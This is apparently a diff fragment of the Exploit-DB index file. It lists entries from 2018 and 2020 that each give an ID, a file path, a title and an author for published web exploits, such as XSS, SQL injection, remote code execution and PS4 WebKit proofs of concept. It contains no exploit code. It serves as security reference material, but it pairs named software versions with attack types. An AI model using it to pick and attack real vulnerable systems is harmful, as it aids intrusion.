49296,exploits/php/webapps/49296.txt,"Queue Management System 4.0.0 - _Add User_ Stored XSS",2020-12-21,"Kislay Kumar",webapps,php,
49297,exploits/multiple/webapps/49297.txt,"Spotweb 1.4.9 - 'search' SQL Injection",2020-12-21,BouSalman,webapps,multiple,
49298,exploits/multiple/webapps/49298.txt,"Academy-LMS 4.3 - Stored XSS",2020-12-21,"Vinicius Alves",webapps,multiple,
49299,exploits/windows/webapps/49299.txt,"Spiceworks 7.5 - HTTP Header Injection",2020-12-21,Ramikan,webapps,windows,
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,
43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
@ -43289,6 +43293,7 @@ id,file,description,date,author,type,platform,port
48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php,
48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting",2020-07-26,"Peter Blue",webapps,php,
48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby,
49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php,
48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php,
48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
@ -43509,3 +43514,13 @@ id,file,description,date,author,type,platform,port
49287,exploits/php/webapps/49287.txt,"Alumni Management System 1.0 - 'id' SQL Injection",2020-12-18,"Aakash Madaan",webapps,php,
49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,
49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
49300,exploits/sco/webapps/49300.txt,"SCO Openserver 5.0.7 - 'section' Reflected XSS",2020-12-21,Ramikan,webapps,sco,
49301,exploits/sco/webapps/49301.txt,"SCO Openserver 5.0.7 - 'outputform' Command Injection",2020-12-21,Ramikan,webapps,sco,
49302,exploits/multiple/webapps/49302.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49303,exploits/multiple/webapps/49303.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49304,exploits/multiple/webapps/49304.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49305,exploits/multiple/webapps/49305.txt,"Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS",2020-12-21,"Marco Nappi",webapps,multiple,
49306,exploits/php/webapps/49306.txt,"Point of Sale System 1.0 - Multiple Stored XSS",2020-12-21,"Saeed Bala Ahmed",webapps,php,
49307,exploits/php/webapps/49307.txt,"Online Marriage Registration System 1.0 - 'searchdata' SQL Injection",2020-12-21,"Raffaele Sabato",webapps,php,
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-11-12,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",2020-12-16,ChendoChap,webapps,hardware,

Can't render this file because it is too large.